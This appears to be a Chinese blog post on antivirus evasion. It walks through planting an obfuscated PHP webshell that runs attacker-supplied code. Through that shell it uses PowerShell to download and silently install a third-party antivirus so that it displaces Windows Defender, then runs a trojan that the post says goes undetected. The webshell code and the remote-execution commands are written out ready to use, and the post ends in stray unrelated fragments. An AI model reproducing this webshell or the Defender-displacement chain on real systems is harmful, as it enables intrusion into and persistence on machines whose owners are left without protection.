免责声明
本文章涉及的内容仅用于安全研究、学习和技术讨论,不针对任何杀毒软件进行虚假陈述或恶意操作。文中所提及的软件及操作均不旨在贬低、攻击或损害其品牌、名誉及正常功能。请读者仅在合法、受控的环境下进行实验和测试,作者对因使用本文内容而产生的任何后果不承担责任。
前言
熟悉我的师傅应该都知道,每当聊到免杀,我总会提到一个“骚操作”:用 PowerShell 下载某绒,然后进行UAC提权拿下让某绒覆盖掉 Windows Defender
(没有针对某绒的意思
听起来是不是很骚?其实我自己也没真正试过,因为那个UAC提权简单了解了下很麻烦(首先是菜,其次是懒。大概是某次半睡半醒的时候,随手看到这个思路就记下来了,可是后来再去找相关资料,却一直找不到任何文章提过这件事。
搭建环境
没啥好说的,随便找个windows 10镜像搞一下就好了
上线webshell
因为提权那个事比较麻烦,所以这块咱就直接模拟咱们拿到的是在defender下的administrator组的用户权限。
defender对webshell也是有一定的检测的,所以咱们要去做一丁点的免杀:
<?php
$c=str_rot13('nffreg');
$c($_REQUEST['x']);
?>
这块直接找了个老马,过不了某60,但最起码能过defender
上线成功,模拟通过webshell拿到管理员权限
拉某绒
在官网找好链接
使用下面的命令
http://192.168.52.134/1.php?x=system("powershell -Command \"Invoke-WebRequest -Uri '杀软下载链接' -OutFile '.\\laji_AV.exe'\"");
全程无感下载,即使前端报500了,后端依旧在下。
根据你拉的AV大小稍等片刻
完毕后执行
?x=system('.\\HrSetup_new_test.exe');
通过这种方式进行安装不会弹出那个该死的管理员确认弹窗,但这个时候就会遇到一个问题
你需要点极速安装才能装上对吧,但是你一个webshell上哪来图形化界面呢?
所以就要思考用静默安装,这里要夸一下某绒。被你绒哥预判了,不得不说火绒6.0之后已经能打很多了,所以转移战线
思考
浅思考一下范围就缩小了很多:我现在需要的是能被defender信任的杀软,并且这个杀软还支持静默安装。
首先不考虑某绒这种没啥广告的老好人了,我一瞬间想到了两名勇士:
tx和金山毒霸
啥也不多说,多说得罪人。直接说结论:
1、TX这边应该是对这种打法早有防备
只要是通过命令行安装直接报网络异常
2、某霸这边就好弄多了
静默安装参数/silent
你的铠甲来了宝贝
再随便找一个马子,在某绒6.0上:
你绒哥还得是你绒哥,再看看咱们的被攻击机上:
咳咳,爽了,睡觉
)
)
:第一个鸿蒙应用)
)
)
